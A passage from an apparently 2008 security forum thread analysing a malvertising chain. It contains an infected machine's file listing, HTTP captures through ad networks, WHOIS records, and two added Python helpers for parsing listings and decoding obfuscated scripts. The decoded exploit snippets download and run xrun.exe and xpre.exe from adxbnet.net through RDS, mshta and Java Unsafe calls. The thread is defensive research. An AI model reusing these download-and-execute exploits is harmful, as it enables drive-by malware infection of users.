Size: 913,355 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANDLDR.DLL
Date: 5/8/2007 12:00 PM
Size: 1,123,285 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANDOS1.DLL
Date: 5/8/2007 12:02 PM
Size: 1,265,683 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANEMUL.DLL
Date: 5/8/2007 12:02 PM
Size: 28,301 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANFUNC.DLL
Date: 5/8/2007 12:02 PM
Size: 63,004 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANKRNL.DLL
Date: 11/23/2007 4:47 PM
Size: 293,888 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANMCR1.DLL
Date: 5/8/2007 12:08 PM
Size: 200,849 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANOTHR.DLL
Date: 5/8/2007 12:03 PM
Size: 40,707 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANSCR.DLL
Date: 5/8/2007 11:57 AM
Size: 276,532 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANTOOL.DLL
Date: 5/8/2007 12:03 PM
Size: 114,320 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANTROJ.DLL
Date: 5/8/2007 12:03 PM
Size: 1,045,102 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\SCANWIN1.DLL
Date: 5/8/2007 12:04 PM
Size: 836,351 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UNACPU.DLL
Date: 5/8/2007 12:04 PM
Size: 9,728 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UNADBX.DLL
Date: 5/8/2007 12:10 PM
Size: 286,720 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\unamscan.dll
Date: 5/8/2007 12:10 PM
Size: 47,616 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UNMIME.DLL
Date: 5/8/2007 12:04 PM
Size: 44,202 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UNPACK.DLL
Date: 5/8/2007 12:10 PM
Size: 331,275 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UNPACKS.DLL
Date: 5/8/2007 12:04 PM
Size: 373,419 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UNPACKS2.DLL
Date: 5/8/2007 12:06 PM
Size: 73,091 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UNPEPACK.DLL
Date: 5/8/2007 12:04 PM
Size: 69,211 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\vbpv.dat
Date: 5/8/2007 12:12 PM
Size: 10 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UpDate\UA27601.DLL
Date: 5/8/2007 11:57 AM
Size: 113,369 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UpDate\UA27602.DLL
Date: 5/8/2007 11:56 AM
Size: 153,123 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UpDate\UA27603.DLL
Date: 5/8/2007 11:56 AM
Size: 165,473 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UpDate\UA27604.DLL
Date: 5/8/2007 11:56 AM
Size: 170,921 bytes
c:\Program Files\TrustedAntivirus\Engines\plugins\UpDate\UADAILY.DLL
Date: 5/8/2007 11:55 AM
Size: 65,256 bytes
c:\Program Files\TrustedAntivirus\Graphics\cross.gif
Date: 2/7/2006 11:40 AM
Size: 1,681 bytes
c:\Program Files\TrustedAntivirus\Graphics\ga6p.gif
Date: 12/15/2006 12:24 PM
Size: 4,151 bytes
c:\Program Files\TrustedAntivirus\Graphics\kb.url
Date: 3/6/2008 11:02 PM
Size: 74 bytes
c:\Program Files\TrustedAntivirus\Graphics\main.ico
Date: 11/24/2006 7:00 PM
Size: 3,774 bytes
c:\Program Files\TrustedAntivirus\Graphics\mini.ico
Date: 11/24/2006 6:11 PM
Size: 28,646 bytes
c:\Program Files\TrustedAntivirus\Graphics\Online.url
Date: 3/6/2008 11:02 PM
Size: 74 bytes
c:\Program Files\TrustedAntivirus\Graphics\rm.url
Date: 3/6/2008 11:02 PM
Size: 62 bytes
c:\Program Files\TrustedAntivirus\Graphics\support.ico
Date: 12/16/2005 11:02 AM
Size: 25,214 bytes
c:\Program Files\TrustedAntivirus\Graphics\Support.url
Date: 3/6/2008 11:02 PM
Size: 74 bytes
c:\Program Files\TrustedAntivirus\Graphics\uninstall.ico
Date: 10/6/2005 12:09 PM
Size: 1,406 bytes
c:\Program Files\TrustedAntivirus\LA\lapv.dat
Date: 3/6/2008 11:02 PM
Size: 3 bytes
c:\Program Files\TrustedAntivirus\LA\License.rtf
Date: 3/6/2008 11:01 PM
Size: 10,817 bytes
c:\Program Files\TrustedAntivirus\Tools\pblock.dll
Date: 11/27/2007 5:30 PM
Size: 222,208 bytes
c:\Program Files\TrustedAntivirus\Tools\sbiebho.dll
Date: 11/27/2007 5:31 PM
Size: 1,102,848 bytes
c:\Program Files\TrustedAntivirus\Up\ASupdater.dat
Date: 3/6/2008 11:02 PM
Size: 359 bytes
c:\Program Files\TrustedAntivirus\Up\gup.exe
Date: 11/7/2007 6:17 PM
Size: 716,800 bytes
c:\Program Files\TrustedAntivirus\Up\PGupdater.dat
Date: 3/6/2008 11:02 PM
Size: 359 bytes
c:\Program Files\TrustedAntivirus\Up\UBupdater.dat
Date: 3/6/2008 11:02 PM
Size: 359 bytes
c:\Program Files\TrustedAntivirus\Up\up.dat
Date: 3/6/2008 11:02 PM
Size: 41 bytes
c:\Program Files\TrustedAntivirus\Up\updater.dat
Date: 3/6/2008 11:02 PM
Size: 259 bytes
c:\Temp\txNog4220.exe
Date: 3/6/2008 10:40 PM
Size: 212,118 bytes
c:\Temp\1cb\syscheck.log
Date: 1/9/2008 6:44 AM
Size: 28,747 bytes
c:\Temp\sanR24\lDii.log
Date: 3/6/2008 10:41 PM
Size: 1,858 bytes
c:\WINDOWS\17PHolmes572.exe
Date: 3/6/2008 10:46 PM
Size: 37,376 bytes
c:\WINDOWS\mrofinu1000106.exe
Date: 3/6/2008 10:47 PM
Size: 37,376 bytes
c:\WINDOWS\mrofinu572.exe.tmp
Date: 3/6/2008 10:41 PM
Size: 37,376 bytes
c:\WINDOWS\uninstall_nmon.vbs
Date: 1/3/2006 5:45 PM
Size: 1,989 bytes
c:\WINDOWS\Downloaded Program Files\UGA6P_0001_N122M2802NetInstaller.exe
Date: 2/28/2008 4:57 PM
Size: 185,344 bytes
c:\WINDOWS\S0xZ\asappsrv.dll
Date: 8/2/2005 4:46 PM
Size: 187,904 bytes
c:\WINDOWS\S0xZ\command.exe
Date: 8/2/2005 4:58 PM
Size: 293,888 bytes
c:\WINDOWS\S0xZ\mXUt.vbs
Date: 7/29/2005 4:24 PM
Size: 472 bytes
c:\WINDOWS\system32\atmtd.dll
Date: 3/6/2008 10:50 PM
Size: 687,592 bytes
c:\WINDOWS\system32\atmtd.dll._
Date: 3/6/2008 10:50 PM
Size: 687,592 bytes
c:\WINDOWS\system32\ddcdbxu.dll
Date: 3/6/2008 10:49 PM
Size: 36,352 bytes
c:\WINDOWS\system32\fccbbya.dll
Date: 3/6/2008 10:39 PM
Size: 36,352 bytes
c:\WINDOWS\system32\jkkihgg.dll
Date: 3/6/2008 10:45 PM
Size: 36,352 bytes
c:\WINDOWS\system32\khfcb.dll
Date: 3/6/2008 10:44 PM
Size: 332,800 bytes
c:\WINDOWS\system32\MSINET.DEP
Date: 6/18/1998 5:00 AM
Size: 2,407 bytes
c:\WINDOWS\system32\MSINET.oca
Date: 4/26/2007 6:30 AM
Size: 29,184 bytes
c:\WINDOWS\system32\MSINET.OCX
Date: 6/24/1998 5:00 AM
Size: 115,016 bytes
c:\WINDOWS\system32\msnav32.ax
Date: 3/6/2008 10:47 PM
Size: 32 bytes
c:\WINDOWS\system32\pac.txt
Date: 9/24/2007 2:05 AM
Size: 279,600 bytes
c:\WINDOWS\system32\qomjgfg.dll
Date: 3/6/2008 10:45 PM
Size: 36,352 bytes
c:\WINDOWS\system32\tuvvtrp.dll
Date: 3/6/2008 10:45 PM
Size: 36,352 bytes
c:\WINDOWS\system32\urqommk.dll
Date: 3/6/2008 10:48 PM
Size: 36,352 bytes
c:\WINDOWS\system32\ax9\np89104.exe
Date: 2/7/2008 11:07 PM
Size: 136,111 bytes
c:\WINDOWS\system32\bv2\renabcom4.exe
Date: 2/14/2008 4:42 PM
Size: 49,152 bytes
c:\WINDOWS\system32\drivers\dhlp.sys
Date: 3/6/2008 11:02 PM
Size: 46,592 bytes
c:\WINDOWS\system32\ev4\philcom3.exe
Date: 8/14/2007 11:22 PM
Size: 25,105 bytes
c:\WINDOWS\system32\iDlo01\iDlo011065.exe
Date: 2/24/2008 8:45 AM
Size: 32,768 bytes
c:\WINDOWS\Temp\cc12.tmp
Date: 3/6/2008 11:07 PM
Size: 0 bytes

Adverts? No thanks!
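Added example (not part of the post or of the tool that produced the listing): a parser for the three-line "path / Date / Size" format of the "Files added" report above, turned into an install timeline. Sorting the dropped executables by timestamp and separating out entries whose timestamp predates the session makes the dropper stages visible at a glance. SAMPLE_REPORT is a constructed excerpt of the entries quoted in the post; the function names are mine.

```python
"""Parse a 'Files added' section of a file-system diff report (the
three-line path / Date / Size form quoted above) into an install
timeline.  Added example, not the thread's own code; SAMPLE_REPORT is a
constructed excerpt of the entries quoted in the post."""
import re
from collections import Counter
from datetime import date, datetime

# Constructed excerpt: paths, dates and sizes copied from the post above.
SAMPLE_REPORT = r"""Files added:
----------------
c:\Documents and Settings\KLY\Local Settings\Temp\yazzsnet.exe
Date: 3/6/2008 10:37 PM
Size: 218,632 bytes
c:\Temp\txNog4220.exe
Date: 3/6/2008 10:40 PM
Size: 212,118 bytes
c:\WINDOWS\system32\fccbbya.dll
Date: 3/6/2008 10:39 PM
Size: 36,352 bytes
c:\WINDOWS\17PHolmes572.exe
Date: 3/6/2008 10:46 PM
Size: 37,376 bytes
c:\WINDOWS\mrofinu1000106.exe
Date: 3/6/2008 10:47 PM
Size: 37,376 bytes
c:\Program Files\TrustedAntivirus\pgs.exe
Date: 12/7/2007 11:03 AM
Size: 2,097,152 bytes
c:\Documents and Settings\KLY\Local Settings\Temp\~uavsetup.exe
Date: 3/6/2008 11:01 PM
Size: 15,712,233 bytes
"""

DATE_RE = re.compile(r"^Date:\s+(\d{1,2}/\d{1,2}/\d{4} \d{1,2}:\d{2} [AP]M)$")
SIZE_RE = re.compile(r"^Size:\s+([\d,]+) bytes$")
EXEC_EXT = (".exe", ".dll", ".sys", ".ocx", ".ax", ".vbs", ".bat")


def parse_files_added(report):
    """Return one dict per entry: path, created (datetime), size (int)."""
    lines = [ln.rstrip() for ln in report.splitlines() if ln.strip()]
    # Entries start after the dashed rule under the "Files added:" header.
    start = next((i + 1 for i, ln in enumerate(lines) if set(ln) == {"-"}), 0)
    entries = []
    for i in range(start, len(lines) - 2, 3):
        path, date_line, size_line = lines[i:i + 3]
        dm, sm = DATE_RE.match(date_line), SIZE_RE.match(size_line)
        if not (dm and sm):
            raise ValueError("malformed entry at %r" % path)
        entries.append({
            "path": path,
            "created": datetime.strptime(dm.group(1), "%m/%d/%Y %I:%M %p"),
            "size": int(sm.group(1).replace(",", "")),
        })
    return entries


def basename(path):
    return path.rsplit("\\", 1)[-1]


def is_executable(path):
    return path.lower().endswith(EXEC_EXT)


def drop_timeline(entries, session_day):
    """Executables written on session_day (ISO date string), in time order."""
    day = date.fromisoformat(session_day)
    dropped = [e for e in entries
               if is_executable(e["path"]) and e["created"].date() == day]
    return sorted(dropped, key=lambda e: e["created"])


def older_than_session(entries, session_day):
    """Files whose timestamp predates the session: typically unpacked from an
    installer that preserved the original mtime, i.e. payload the dropper
    carried rather than code written fresh during the infection."""
    day = date.fromisoformat(session_day)
    return [e for e in entries if e["created"].date() < day]


def files_per_minute(entries):
    """How many files landed in each minute; bursts mark each dropper stage."""
    return Counter(e["created"].strftime("%Y-%m-%d %H:%M") for e in entries)


if __name__ == "__main__":
    entries = parse_files_added(SAMPLE_REPORT)
    for e in drop_timeline(entries, "2008-03-06"):
        print(e["created"].strftime("%H:%M"), e["size"], e["path"])
    for e in older_than_session(entries, "2008-03-06"):
        print("pre-dated:", e["path"], e["created"].date())
```

Run against the full listing, the timeline shows the order in which the droppers landed and the minute-level bursts where one stage wrote several files at once; the pre-dated entries (the TrustedAntivirus install tree, for instance) are the bundled payload rather than freshly generated binaries.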
Kimberly
<h4>
New domains - placeholders
</h4>
The redirect is coming through the combo www.axill.com & ad2.adecn.com also.

Placeholder.

www.awltovhc.net

CODE
GET http://www.awltovhc.net/placeholder-1701629-86358216?atype=b0&pid=108459 HTTP/1.1
Accept: */*
Referer: http://ad.adrefer.net/serve/showmsr?atype=b0&pid=108459&cid=1331648&tid=86353614
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.awltovhc.net
Proxy-Connection: Keep-Alive
______________________________

Iframes.

The 3 links still contain obfuscated scripts & exploits, slightly different from the ones above but with the same results. They can be safely viewed using a sniffer. I will only post decoded parts.

CODE
GET http://adxbnet.net/code/smain.php?scout=acxcrds HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ad.adrefer.net/serve/showmsr?atype=b0&pid=108459&cid=1331648&tid=86353614
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: adxbnet.net
Proxy-Connection: Keep-Alive

CODE
Call DownExRdsDsc("http://adxbnet.net/xrun.exe", "xrun.exe")
Call DownExRdsDsc("http://adxbnet.net/xpre.exe", "xpre.exe")
CODE
GET http://adxbnet.net/code/smain.php?scout=acxcobj HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ad.adrefer.net/serve/showmsr?atype=b0&pid=108459&cid=1331648&tid=86353614
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: adxbnet.net
Proxy-Connection: Keep-Alive

CODE
if(b) { try { b.run("mshta http://adxbnet.net/code/srun.php", 0); }catch(e){} }
...
Call DownExRdsDsc("http://adxbnet.net/xrun.exe", "xrun.exe")
Call DownExRdsDsc("http://adxbnet.net/xpre.exe", "xpre.exe")
CODE
GET http://adxbnet.net/code/smain.php?scout=jvcxeng HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ad.adrefer.net/serve/showmsr?atype=b0&pid=108459&cid=1331648&tid=86353614
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: adxbnet.net
Proxy-Connection: Keep-Alive

CODE
// SJ_SECMAN INVOKE
function sjvmsec() { try {
var sda="http://adxbnet.net/xrun.exe;http://adxbnet.net/xpre.exe";
var con=jvmsec.getClass().forName("sun.plugin.liveconnect.SecureInvocation");
var sys=jvmsec.getClass().forName("java.lang.System");
var sec=jvmsec.getClass().forName("java.lang.SecurityManager");
jvmsec.main(con, sys, sec, sda);
} catch(e) {} }

// SJ_USAFE INVOKE
function sjvmusaf() { try {
var sda = "http://adxbnet.net/xrun.exe;http://adxbnet.net/xpre.exe";
var ucl = jvmusafe.getClass().forName("sun.misc.Unsafe");
var umt = ucl.getMethod("getUnsafe", null);
var usf = umt.invoke(umt, null);
jvmusafe.main(usf);
var dcl = usf.defineClass("vlocal", jvmusafe.bclass, 0, jvmusafe.classsz);
var dcd = usf.allocateInstance(dcl);
dcd.vload(usf, sda);
} catch(d) {} }
______________________________

Banner.

85.17.162.100/banner/mp3downloads.jpg
IPB Image
______________________________

adxbnet.net - 83.216.217.242

ICANN Registrar: MONIKER ONLINE SERVICES, INC.
Created: 2008-05-26
Expires: 2009-05-26
Registrar Status: clientDeleteProhibited
Registrar Status: clientTransferProhibited
Registrar Status: clientUpdateProhibited
Name Server: NS1.DOMAINSERVICE.COM (has 361,990 domains)
Name Server: NS2.DOMAINSERVICE.COM
Name Server: NS3.DOMAINSERVICE.COM
Name Server: NS4.DOMAINSERVICE.COM
Whois Server: whois.moniker.com

Server Type: Apache/2.2.3 (CentOS)
IP Address: 83.216.217.242
IP Location - Niederosterreich - Baden - Colobase Customer Allocation
Reverse IP: 20 other sites hosted on this server.

Domain Name: ADXBNET.NET

Registrant [1398527]:
Moniker Privacy Services
20 SW 27th Ave.
Suite 201
Pompano Beach
FL
33069
US

Websites.
  1. Adoutfer.net
  2. Adpopserve.net
  3. Adpopshow.net
  4. Adpopups.net
  5. Adxanet.net
  6. Adxbnet.net
  7. Adxrnet.net
  8. Awofkwy.net
  9. Especialads.com
  10. Iefjios.net
  11. Kasdfps.net
  12. Kiafjwo.net
  13. Netaddirect.com
  14. Netcrefer.net
  15. Netcshow.net
  16. Netsdir.net
  17. Snipenet.net
  18. Snipernet.biz
  19. Snipernet.us
  20. Sxload.net
  21. Xpseek.net
Iefjios.net is currently being used as a placeholder also.
______________________________

ad.adrefer.net - 85.17.162.100

ICANN Registrar: MONIKER ONLINE SERVICES, INC.
Created: 2007-05-02
Expires: 2009-05-02
Registrar Status: clientDeleteProhibited
Registrar Status: clientTransferProhibited
Registrar Status: clientUpdateProhibited
Name Server: NS1.DOMAINSERVICE.COM (has 361,990 domains)
Name Server: NS2.DOMAINSERVICE.COM
Name Server: NS3.DOMAINSERVICE.COM
Name Server: NS4.DOMAINSERVICE.COM
Whois Server: whois.moniker.com

Server Type: Apache/2.0.52 (CentOS)
IP Address: 85.17.162.100
IP Location - Noord-holland - Amsterdam - Leaseweb
Reverse IP: 4 other sites hosted on this server

Domain Name: ADREFER.NET

Registrant [693328]:
Moniker Privacy Services
20 SW 27th Ave.
Suite 201
Pompano Beach
FL
33069
US

Websites.
  1. Adrefer.net
  2. Awltovhc.net
  3. Ikwlkad.net
  4. Iwdjiamk.net
  5. Tqlkg.net
______________________________

adecn.com (Microsoft) has been notified.


Note: Thanks for the PM about adxbnet.net and ikwlkad.net
Kimberly
I wasn't satisfied with the network captures made the other day as I got "caught" by surprise. So here we go.

In this packet capture, we see www.axill.com & ad2.adecn.com
CODE
GET http://ad2.adecn.com/here.spot?v=2.2;time=418;spotId=7094;c=0;ms=1213289268868 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.axill.com/cpm/Cpm.aspx?affid=31637&W=468
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: ad2.adecn.com
Proxy-Connection: Keep-Alive
Cookie: EC=9320d7d22ea7abac005dba884e3f4785

In the ad2.adecn.com capture, we notice an iframe giving us the next location.
CODE
<script language="javascript" src="http://ad.adrefer.net/serve/servemsr?atype=b0&pid=108459"></script></body>

That page contains another iframe. Notice the ad2.adecn.com in the referer.
CODE
GET http://ad.adrefer.net/serve/servemsr?atype=b0&pid=108459 HTTP/1.1
Accept: */*
Referer: http://ad2.adecn.com/here.spot?v=2.2;time=418;spotId=7094;c=0;ms=1213289268868
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: ad.adrefer.net
Proxy-Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Thu, 12 Jun 2008 16:47:52 GMT
Server: Apache/2.0.52 (CentOS)
Content-Location: servemsr.php
Vary: negotiate
TCN: choice
X-Powered-By: PHP/4.3.9
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Last-Modified: Thu, 12 Jun 2008 16:47:52 GMT
Expires: Mon, 01 Jul 2000 01:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-length: 805
Proxy-connection: keep-alive

document.write('<iframe src="http://ad.adrefer.net/serve/showmsr?atype=b0&pid=108459&cid=1291138&tid=867817323" width="468" height="60" frameborder="0" scrolling="no"></iframe>');

From there, we will be redirected again to a placeholder.
CODE
GET http://ad.adrefer.net/serve/showmsr?atype=b0&pid=108459&cid=1291138&tid=867817323 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ad2.adecn.com/here.spot?v=2.2;time=418;spotId=7094;c=0;ms=1213289268868
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: ad.adrefer.net
Proxy-Connection: Keep-Alive

<script type="text/javascript" language="javascript" src="http://www.ikwlkad.net/placeholder-1740304-867821418?atype=b0&pid=108459"></script>
</body></html>

CODE
GET http://www.ikwlkad.net/placeholder-1740304-867821418?atype=b0&pid=108459 HTTP/1.1
Accept: */*
Referer: http://ad.adrefer.net/serve/showmsr?atype=b0&pid=108459&cid=1291138&tid=867817323
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: www.ikwlkad.net
Proxy-Connection: Keep-Alive

www.ikwlkad.net/placeholder-1740304-867821418 contains some unescaped text which decodes to the next location and the advertising image to display.
CODE
document.write(unescape("%3Ca%20href%3D%22http%3A%2F%2Fklnl04.movies01.hop.clickbank.net%3Fid%3Dtmoviedwnloading_w2%22%20target%3D%22_top%22%3E%3Cimg%20src%3D%22http%3A%2F%2F85.17.162.100%2Fbanner%2Fmoviedownloads.jpg%22%20width%3D%22468%22%20height%3D%2260%22%20alt%3D%22MOVIEDOWNLOADS%22%20border%3D%220%22%2F%3E%3C%2Fa%3E%3Cscript%20language%3D%22javascript%22%20src%3D%22http%3A%2F%2Fwww.awofkwy.net%2Fplaceholder-1603100-867826860%22%3E%3C%2Fscript%3E"));

Decoded.
CODE
<a href="http://klnl04.movies01.hop.clickbank.net?id=tmoviedwnloading_w2" target="_top"><img src="http://85.17.162.100/banner/moviedownloads.jpg" width="468" height="60" alt="MOVIEDOWNLOADS" border="0"/></a><script language="javascript" src="http://www.awofkwy.net/placeholder-1603100-867826860"></script>

www.awofkwy.net/placeholder-1603100-867826860 contains obfuscated code as seen below. Once decoded, they show us our 3 iframes as seen earlier.

IPB Image

IPB Image
______________________________

Banner.
IPB Image
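Added example (not code from the thread): a small decoder for the unescape() obfuscation the placeholder scripts use, covering both the JavaScript `document.write(unescape("%3C..."))` form decoded in the post above and the split-string VBScript form `Unescape("%"+"63%6c..."+"...")` that a later post in this thread decodes by hand. It concatenates the string pieces, applies the `%XX` / `%uXXXX` rules of unescape, pulls out the URLs, and pairs any decoded CLSID/ProgID with what that object lets a script do. The two samples are copied from the posts; the function names and the KNOWN_COM table are my own.

```python
"""Decode unescape()/Unescape() obfuscation from ad placeholder scripts.
Added example, not the thread's own code.  JS_SAMPLE and VB_SAMPLE are
copied from the posts in this thread."""
import re

# JavaScript sample: the placeholder script quoted in the post above.
JS_SAMPLE = 'document.write(unescape("%3Ca%20href%3D%22http%3A%2F%2Fklnl04.movies01.hop.clickbank.net%3Fid%3Dtmoviedwnloading_w2%22%20target%3D%22_top%22%3E%3Cimg%20src%3D%22http%3A%2F%2F85.17.162.100%2Fbanner%2Fmoviedownloads.jpg%22%20width%3D%22468%22%20height%3D%2260%22%20alt%3D%22MOVIEDOWNLOADS%22%20border%3D%220%22%2F%3E%3C%2Fa%3E%3Cscript%20language%3D%22javascript%22%20src%3D%22http%3A%2F%2Fwww.awofkwy.net%2Fplaceholder-1603100-867826860%22%3E%3C%2Fscript%3E"));'

# VBScript sample: four lines of the obfuscated downloader quoted later in
# the thread; the "%"+"..." split keeps the ProgIDs out of plain string scans.
VB_SAMPLE = '''cobj.setAttribute "classid", Unescape("%"+"63%6c%73%69%"+"64%3a%42%44%39%36%43%35%35%36%2d%36%35%41%33%2d%31%31%44%30%2d%39%38%33%41%2d%30%30%43%30%34%46%43%32%39%45%33%36")
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"57%69%6e%48%"+"74%74%70%2e%57%69%6e%48%74%74%70%52%65%71%75%65%73%74%2e%35%2e%31"),"")
Set aobj = cobj.CreateObject(Unescape("%"+"41%44%4f%44%"+"42%2e%53%74%72%65%61%6d"),"")
Set eobj = cobj.CreateObject(Unescape("%"+"53%68%65%6c%6c%2e%"+"41%70%70%6c%69%63%61%74%69%6f%6e"),"")
'''

# unescape( "lit" + "lit" ... ) with any number of concatenated pieces
UNESCAPE_CALL = re.compile(r'[Uu]nescape\s*\(\s*((?:"[^"]*"\s*\+?\s*)+)\)')
STRING_LIT = re.compile(r'"([^"]*)"')
PCT = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")
URL = re.compile(r"""https?://[^\s"'<>]+""")

# COM identifiers seen in the decoded VBScript and what each one gives a
# script (lookup table written for this example; lowercase keys).
KNOWN_COM = {
    "clsid:bd96c556-65a3-11d0-983a-00c04fc29e36": "RDS.DataSpace: CreateObject factory for the others",
    "winhttp.winhttprequest.5.1": "HTTP client (fetch the payload)",
    "winhttp.winhttprequest": "HTTP client (fetch the payload)",
    "microsoft.xmlhttp": "HTTP client (fetch the payload)",
    "msxml2.xmlhttp": "HTTP client (fetch the payload)",
    "adodb.stream": "write downloaded bytes to disk",
    "shell.application": "launch the written file",
    "scripting.filesystemobject": "file-system access (temp path, cleanup)",
}


def js_unescape(s):
    """JavaScript/VBScript unescape(): %XX and %uXXXX become characters."""
    return PCT.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def decode_unescape_calls(script):
    """Decoded value of every unescape(...) call, pieces concatenated first."""
    return [js_unescape("".join(STRING_LIT.findall(m.group(1))))
            for m in UNESCAPE_CALL.finditer(script)]


def extract_urls(text):
    return URL.findall(text)


def identify_com(decoded_values):
    """Pair each decoded CLSID/ProgID with its known purpose."""
    return [(v, KNOWN_COM[v.lower()]) for v in decoded_values if v.lower() in KNOWN_COM]


def triage(script):
    """Everything an analyst wants from one obfuscated script, in one dict."""
    decoded = decode_unescape_calls(script)
    return {
        "decoded": decoded,
        "urls": sorted({u for d in decoded for u in extract_urls(d)}),
        "com_objects": identify_com(decoded),
    }


if __name__ == "__main__":
    for name, sample in (("JS", JS_SAMPLE), ("VBScript", VB_SAMPLE)):
        result = triage(sample)
        print(name, "decoded:", result["decoded"])
        print(name, "urls:", result["urls"])
        print(name, "COM:", result["com_objects"])
```

The decoder only undoes the unescape layer; the placeholder pages in the thread also wrap their payload in other encodings, so it belongs at the end of the chain, after whatever outer layer has been peeled off. Matching on the decoded ProgIDs rather than on the raw script is the point: a signature on `ADODB.Stream` never fires on the split `"%"+"41%44%4f%44%"+"42..."` form.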
Kimberly
New round ... from a highly visited website this time. Combo ad.directaclick.com and ad2.adecn.com this time.

ad2.adecn.com/here.spot?v=2.2;time=617;spotId=6720;c=0;ms=1213456740767
cds.adecn.com/adecn/script.js
ad.adrefer.net/serve/servemsr?atype=b0&pid=108459
ad.adrefer.net/serve/showmsr?atype=b0&pid=108459&cid=1583409&tid=1370239143
www.tqlkg.net/placeholder-1730207-1370241411?atype=b0&pid=108459

CODE
<a href="http://www.kqzyfj.com/click-2406336-10418121" target="_top"><img src="http://www.lduhtrp.net/image-2406336-10418121" width="468" height="60" alt="" border="0"/></a><script language="javascript" src="http://www.kasdfps.net/placeholder-1560236-1370245887"></script>

www.lduhtrp.net/image-2406336-10418121
www.lduhtrp.net

CODE
GET http://www.lduhtrp.net/image-2406336-10418121 HTTP/1.1
Accept: */*
Referer: http://ad.adrefer.net/serve/showmsr?atype=b0&pid=108459&cid=1583409&tid=1370239143
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.lduhtrp.net
Proxy-Connection: Keep-Alive

HTTP/1.0 302 Found
Server: Resin/2.1.17
P3P: policyref="http://www.lduhtrp.net/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"
Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Sat, 14 Jun 2008 15:19:09 GMT
Location: http://www.yceml.net/0969/10418121-6.jpg
Content-Type: text/plain
Date: Sat, 14 Jun 2008 15:19:08 GMT
Proxy-connection: close

The URL has moved <a href="http://www.yceml.net/0969/10418121-6.jpg">here</a>
HTTP/1.1 200 OK
Date: Sat, 14 Jun 2008 15:19:09 GMT

www.yceml.net/0969/10418121-6.jpg
www.kasdfps.net/placeholder-1560236-1370245887
adxbnet.net/code/smain.php?scout=acxcrds
adxbnet.net/code/smain.php?scout=acxcobj
adxbnet.net/code/smain.php?scout=jvcxeng
Banner.
IPB Image
______________________________

lduhtrp.net - 63.215.202.74

Website Title: Commission Junction - Privacy Policy (Internet User Privacy)
ICANN Registrar: NETWORK SOLUTIONS, LLC.

IP Location - California - Milpitas - Valueclick Inc

Registrant:
Commission Junction
530 East Montectio St.
Santa Barbara, CA 93103
US

Domain Name: LDUHTRP.NET

Administrative Contact, Technical Contact:
ValueClick
30699 Russell Ranch Rd
Ste 250
Westlake Village, CA 91361
US
818-575-4500

Record expires on 05-Apr-2009.
Record created on 05-Apr-2004.
Database last updated on 14-Jun-2008 11:46:13 EDT.

